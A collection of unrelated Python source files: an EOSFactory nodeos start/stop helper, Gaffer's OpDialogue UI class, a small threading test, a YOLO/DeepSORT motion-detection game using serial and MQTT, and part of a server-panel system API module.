"--plugin eosio::producer_plugin",
"--plugin eosio::chain_api_plugin",
"--plugin eosio::http_plugin",
"--plugin eosio::history_api_plugin"
]
if clear:
node_stop()
args_.extend([
"--genesis-json", config.genesis_json(),
"--delete-all-blocks"
])
return args_
def keosd_start():
if not config.keosd_wallet_dir(raise_error=False):
utils.process([config.keosd_exe()])
while True:
time.sleep(1)
if config.keosd_wallet_dir(raise_error=False):
break
def on_nodeos_error(clear=False):
node_stop()
args_ = args(clear)
args_.insert(0, config.node_exe())
command_line = " ".join(args_)
raise errors.Error('''
The local ``nodeos`` failed to start twice in sequence. Perhaps, something is
wrong with configuration of the system. See the command line issued:
''')
print("\n{}\n".format(command_line))
logger.INFO('''
Now, see the result of an execution of the command line:
''')
def runInThread():
p = subprocess.run(
command_line,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
err_msg = p.stderr.decode("ISO-8859-1")
if "error" in err_msg and not "exit shutdown" in err_msg:
raise errors.Error(err_msg)
elif not err_msg or "exit shutdown" in err_msg:
logger.OUT(
'''
Just another instability incident of the ``nodeos`` executable.
Rerun the script.
'''
)
else:
print(err_msg)
thread = threading.Thread(target=runInThread)
thread.start()
time.sleep(10)
node_stop()
exit()
def node_start(clear=False, nodeos_stdout=None):
'''Start the local EOSIO node.
Args:
clear (bool): If set, the blockchain is deleted and then re-created.
nodeos_stdout (str): If set, a file where *stdout* stream of
the local *nodeos* is send. Note that the file can be included to
the configuration of EOSFactory, see :func:`.core.config.nodeos_stdout`.
If the file is set with the configuration, and in the same time
it is set with this argument, the argument setting prevails.
'''
args_ = args(clear)
if setup.is_print_command_line:
print("nodeos command line:")
print(config.node_exe() + " " + " ".join(args_))
if not nodeos_stdout:
nodeos_stdout = config.nodeos_stdout()
std_out_handle = subprocess.DEVNULL
if nodeos_stdout:
try:
std_out_handle = open(nodeos_stdout, 'w')
except Exception as e:
raise errors.Error('''
Error when preparing to start the local EOS node, opening the given stdout
log file that is
{}
Error message is
{}
'''.format(nodeos_stdout, str(e)))
def onExit():
if not std_out_handle == subprocess.DEVNULL:
try:
std_out_handle.close()
except:
pass
args_.insert(0, config.node_exe())
def runInThread():
proc = subprocess.Popen(
" ".join(args_),
stdin=subprocess.DEVNULL, stdout=std_out_handle,
stderr=subprocess.DEVNULL, shell=True)
proc.wait()
onExit()
return
thread = threading.Thread(target=runInThread)
thread.start()
def node_probe():
count = 10
num = 5
block_num = None
while True:
time.sleep(1)
try:
import eosfactory.core.cleos_get as cleos_get
head_block_num = cleos_get.GetInfo(is_verbose=0).head_block
except:
head_block_num = 0
finally:
print(".", end="", flush=True)
if block_num is None:
block_num = head_block_num
if head_block_num - block_num >= num:
print()
logger.INFO('''
Local node is running. Block number is {}
'''.format(head_block_num))
break
count = count - 1
if count <= 0:
raise errors.Error('''
The local node does not respond.
''')
def is_local_node_process_running(name=None):
if not name:
name = config.node_exe()
return name in utils.process(
'ps aux | grep -v grep | grep ' + name, shell=True)
def node_stop():
# You can see if the process is a zombie by using top or
# the following command:
# ps aux | awk '$8=="Z" {print $2}'
pids = get_pid()
count = 10
if pids:
for pid in pids:
os.system("kill " + str(pid))
while count > 0:
time.sleep(1)
if not is_local_node_process_running():
break
count = count -1
if count <= 0:
raise errors.Error('''
Failed to kill {}. Pid is {}.
'''.format(config.node_exe_name(), str(pids))
)
else:
logger.INFO('''
Local node is stopped {}.
'''.format(str(pids)))
def node_is_running():
return not get_pid()
return dir
|
OpDialogue.py
|
##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import sys
import threading
import traceback
import IECore
import Gaffer
import GafferUI
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = Gaffer.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( IECore.V2i( 1 ), parenting = { "expand" : True } )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( IECore.V2i( 250, 1 ), parenting = { "expand" : True } )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged )
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signal2()
self.__opExecutedSignal = Gaffer.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__close ) )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateExecution ) )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception, e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "opDialogueFailure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "opDialogueSuccessWarning.png" if problems else "opDialogueSuccess.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerPlugValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
input_test.py
|
import threading
import argparse
def get_input():
angle0 = float(input())
return angle0
for i in range(10):
if i%2==0:
print("type : ")
input_thread = threading.Thread(target=get_input)
input_thread.start()
|
no_tracker.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import sys
#sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
import os
import datetime
from timeit import time
import warnings
import cv2
import numpy as np
import argparse
from PIL import Image
from yolo import YOLO
from deep_sort import preprocessing
from deep_sort import nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from tools import generate_detections as gdet
from deep_sort.detection import Detection as ddet
from collections import deque
from keras import backend
import tensorflow as tf
from tensorflow.compat.v1 import InteractiveSession
#module for serial listening
import threading
import time
import random
import serial
# module for mqtt
import paho.mqtt.client as mqtt
from math import sqrt
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
#serial listening settings
PORT = '/dev/ttyUSB0'
detect = 0
#mqtt setting
mqtt_topic = "Nano/player/IMU"
mqtt_broker_ip = "140.113.213.21"
mqtt_topic_pulish = "Server/player/ANS"
client = mqtt.Client()
player_flag = [0, 0, 0]
player_camera_move = [0,0,0]
player_list = ["player001", "player002", "player003"]
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input",help="path to input video", default = "./test_video/TownCentreXVID.avi")
ap.add_argument("-c", "--class",help="name of class", default = "person")
args = vars(ap.parse_args())
pts = [deque(maxlen=30) for _ in range(9999)]
warnings.filterwarnings('ignore')
# initialize a list of colors to represent each possible class label
np.random.seed(100)
COLORS = np.random.randint(0, 255, size=(200, 3),
dtype="uint8")
#list = [[] for _ in range(100)]
def get_iou(bbox_ai, bbox_gt):
iou_x = max(bbox_ai[0], bbox_gt[0]) # x
iou_y = max(bbox_ai[1], bbox_gt[1]) # y
iou_w = min(bbox_ai[2]+bbox_ai[0], bbox_gt[2]+bbox_gt[0]) - iou_x # w
iou_w = max(iou_w, 0)
iou_h = min(bbox_ai[3]+bbox_ai[1], bbox_gt[3]+bbox_gt[1]) - iou_y # h
iou_h = max(iou_h, 0)
iou_area = iou_w * iou_h
all_area = bbox_ai[2]*bbox_ai[3] + bbox_gt[2]*bbox_gt[3] - iou_area
return max(iou_area/all_area, 0)
def listen(PORT):
global detect
print('Thread start listening')
print('Initial serial port......')
COM_PORT = PORT # 指定通訊埠名稱
BAUD_RATES = 9600 # 設定傳輸速率
ser = serial.Serial(COM_PORT, BAUD_RATES) # 初始化序列通訊
time.sleep(2)
ser.write(b'reset\n')
print('Done')
time.sleep(1)
#倒數準備開始
for i in range (3,-1,-1):
time.sleep(1)
print(i)
print('Thread : first back to player')
ser.write(b'start\n')
try:
while True:
data = ''
while ser.in_waiting: # 若收到序列資料…
data_raw = ser.readline() # 讀取一行
data = data_raw.decode().strip() # 用預設的UTF-8解碼 去除句尾換行
#print('接收到的原始資料:', data_raw)
#print('接收到的資料:', data)
if data == 'Arduino : start turn back':
detect = 0
print('Thread : back to player')
if data == 'Arduino : finish turn front':
detect = 1
print('Thread : face to player')
except KeyboardInterrupt:
ser.close() # 清除序列通訊物件
print('Exit!')
def readSensor():
global detect,client
def on_connect(client, userdata, flags, rc):
print("Connected!", str(rc))
client.subscribe(mqtt_topic)
def on_message(client, userdata, msg):
global flag
get_message = str(msg.payload)
get_message = get_message.split("'")[1]
get_list = get_message.split(", ")
#print("Topic: ", msg.topic + "\nMessage: " + get_message)
#print(get_list)
total = sqrt(float(get_list[1])**2 + float(get_list[2])**2 + float(get_list[3])**2)
try:
if total > 1.1: # 這裡可以換成判斷玩家在動的標準
who = player_list.index(get_list[0])
if player_flag[who] == 0 and detect == 1:
client.publish(mqtt_topic_pulish,str(who+1))
print(get_list[0] + " move !")
player_flag[who] = 1
print(player_flag)
except:
pass
client.on_connect = on_connect
client.on_message = on_message
client.connect(mqtt_broker_ip, 1883)
client.loop_forever()
client.disconnect()
def main(yolo):
global player_flag
start = time.time()
max_cosine_distance = 0.3
nn_budget = None
nms_max_overlap = 1.0
counter = []
#deep_sort
model_filename = 'model_data/market1501.pb'
encoder = gdet.create_box_encoder(model_filename,batch_size=1)
frame_index = -1
video_capture = cv2.VideoCapture(0)
###########
# initialize frame for movement detector
ret, frame = video_capture.read()
avg = cv2.blur(frame, (4, 4))
avg_float = np.float32(avg)
###########
###########
# create thread to read serial input from arduino
t = threading.Thread(target = listen, args=(PORT,))
t.setDaemon(True)
t.start()
global detect
#create thread to read sensor data
t2 = threading.Thread(target = readSensor)
t2.setDaemon(True)
t2.start()
global client
###########
fps = 0.0
while True:
ret, frame = video_capture.read() # frame shape 640*480*3
if ret != True:
break
t1 = time.time()
######################
# movement detector
# 模糊處理
blur = cv2.blur(frame, (4, 4))
# 計算目前影格與平均影像的差異值
diff = cv2.absdiff(avg, blur)
# 將圖片轉為灰階
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
# 篩選出變動程度大於門檻值的區域
ret, thresh = cv2.threshold(gray, 25, 255, cv2.THRESH_BINARY)
# 使用型態轉換函數去除雜訊
kernel = np.ones((5, 5), np.uint8)
thresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=2)
thresh = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel, iterations=2)
# 產生等高線
contours, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
moving_boxes = []
for c in contours:
# 忽略太小的區域
if cv2.contourArea(c) < 1000:
continue
# 偵測到物體,可以自己加上處理的程式碼在這裡...
# 計算等高線的外框範圍
(x, y, w, h) = cv2.boundingRect(c)
moving_boxes.append((x,y,w,h))
# 畫出外框
#cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
# 畫出等高線(除錯用)
cv2.drawContours(frame, contours, -1, (0, 255, 255), 2)
######################
#image = Image.fromarray(frame)
image = Image.fromarray(frame[...,::-1]) #bgr to rgb
boxs, confidence, class_names = yolo.detect_image(image)
features = encoder(frame,boxs)
# score to 1.0 here).
detections = [Detection(bbox, 1.0, feature) for bbox, feature in zip(boxs, features)]
# Run non-maxima suppression.
boxes = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
indices = preprocessing.non_max_suppression(boxes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
# Call the tracker
# tracker.predict()
# tracker.update(detections)
i = int(0)
indexIDs = []
c = []
boxes = []
moving_record = []
#yolo bounding box
player = 1
#sort bounding box's order by the x coordinate in each box
sort_bbox = sorted(detections, key = lambda x: x.to_tlbr()[0])
for det in sort_bbox:
bbox = det.to_tlbr()
cv2.rectangle(frame,(int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])),(255,255,255), 2)
b0 = bbox[0]#.split('.')[0] + '.' + str(bbox[0]).split('.')[0][:1]
b1 = bbox[1]#.split('.')[0] + '.' + str(bbox[1]).split('.')[0][:1]
b2 = bbox[2]-bbox[0]#.split('.')[0] + '.' + str(bbox[3]).split('.')[0][:1]
b3 = bbox[3]-bbox[1]
#calculate each person's moving ratio
iou_sum = 0
for j in moving_boxes:
iou = get_iou(j,(b0,b1,b2,b3))
iou_sum += iou
moving_record.append((player,iou_sum))
player += 1
if detect == 1:
index = 0
for person,move in moving_record:
if move > 0.5 and player_flag[index] == 0:
print(f'player{index+1} camera move')
player_flag[index] = 1
client.publish(mqtt_topic_pulish,str(index+1))
index += 1
count = len(set(counter))
cv2.putText(frame, "Total Pedestrian Counter: "+str(count),(int(20), int(120)),0, 5e-3 * 200, (0,255,0),2)
cv2.putText(frame, "Current Pedestrian Counter: "+str(i),(int(20), int(80)),0, 5e-3 * 200, (0,255,0),2)
cv2.putText(frame, "FPS: %f"%(fps),(int(20), int(40)),0, 5e-3 * 200, (0,255,0),3)
cv2.namedWindow("YOLO4_Deep_SORT", 0)
cv2.resizeWindow('YOLO4_Deep_SORT', 1024, 768)
cv2.imshow('YOLO4_Deep_SORT', frame)
fps = ( fps + (1./(time.time()-t1)) ) / 2
frame_index = frame_index + 1
# Press Q to stop!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
##############
#update frame for movement detector, the last argument is updating rate
cv2.accumulateWeighted(blur, avg_float, 0.2)
avg = cv2.convertScaleAbs(avg_float)
#####################
print(" ")
print("[Finish]")
end = time.time()
video_capture.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main(YOLO())
|
system_api.py
|
# coding: utf-8
import psutil
import time
import os
import re
import math
import json
from flask import Flask, session
from flask import request
import db
import mw
import requests
import config_api
from threading import Thread
from time import sleep
def mw_async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
class system_api:
setupPath = None
pids = None
def __init__(self):
self.setupPath = mw.getServerDir()
##### ----- start ----- ###
def networkApi(self):
data = self.getNetWork()
return mw.getJson(data)
def updateServerApi(self):
stype = request.args.get('type', 'check')
version = request.args.get('version', '')
return self.updateServer(stype, version)
def systemTotalApi(self):
data = self.getSystemTotal()
return mw.getJson(data)
def diskInfoApi(self):
diskInfo = self.getDiskInfo()
return mw.getJson(diskInfo)
def setControlApi(self):
stype = request.form.get('type', '')
day = request.form.get('day', '')
data = self.setControl(stype, day)
return data
def getLoadAverageApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getLoadAverageData(start, end)
return mw.getJson(data)
def getCpuIoApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getCpuIoData(start, end)
return mw.getJson(data)
def getDiskIoApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getDiskIoData(start, end)
return mw.getJson(data)
def getNetworkIoApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getNetWorkIoData(start, end)
return mw.getJson(data)
def rememoryApi(self):
os.system('sync')
scriptFile = mw.getRunDir() + '/script/rememory.sh'
mw.execShell("/bin/bash " + scriptFile)
data = self.getMemInfo()
return mw.getJson(data)
# 重启面板
def restartApi(self):
self.restartMw()
return mw.returnJson(True, '面板已重启!')
def restartServerApi(self):
if mw.isAppleSystem():
return mw.returnJson(False, "开发环境不可重起")
self.restartServer()
return mw.returnJson(True, '正在重启服务器!')
##### ----- end ----- ###
@mw_async
def restartMw(self):
sleep(0.3)
# cmd = mw.getRunDir() + '/scripts/init.d/mw restart'
# print cmd
mw.execShell('service mw restart')
@mw_async
def restartServer(self):
if not mw.isRestart():
return mw.returnJson(False, '请等待所有安装任务完成再执行!')
mw.execShell("sync && init 6 &")
return mw.returnJson(True, '命令发送成功!')
# 名取PID
def getPid(self, pname):
try:
if not self.pids:
self.pids = psutil.pids()
for pid in self.pids:
if psutil.Process(pid).name() == pname:
return True
return False
except:
return False
# 检查端口是否占用
def isOpen(self, port):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(('127.0.0.1', int(port)))
s.shutdown(2)
return True
except:
return False
# 检测指定进程是否存活
def checkProcess(self, pid):
try:
if not self.pids:
self.pids = psutil.pids()
if int(pid) in self.pids:
return True
return False
except:
return False
def getPanelInfo(self, get=None):
# 取面板配置
address = mw.GetLocalIp()
try:
try:
port = web.ctx.host.split(':')[1]
except:
port = mw.readFile('data/port.pl')
except:
port = '8888'
domain = ''
if os.path.exists('data/domain.conf'):
domain = mw.readFile('data/domain.conf')
autoUpdate = ''
if os.path.exists('data/autoUpdate.pl'):
autoUpdate = 'checked'
limitip = ''
if os.path.exists('data/limitip.conf'):
limitip = mw.readFile('data/limitip.conf')
templates = []
for template in os.listdir('templates/'):
if os.path.isdir('templates/' + template):
templates.append(template)
template = mw.readFile('data/templates.pl')
check502 = ''
if os.path.exists('data/502Task.pl'):
check502 = 'checked'
return {'port': port, 'address': address, 'domain': domain, 'auto': autoUpdate, '502': check502, 'limitip': limitip, 'templates': templates, 'template': template}
def getSystemTotal(self, interval=1):
# 取系统统计信息
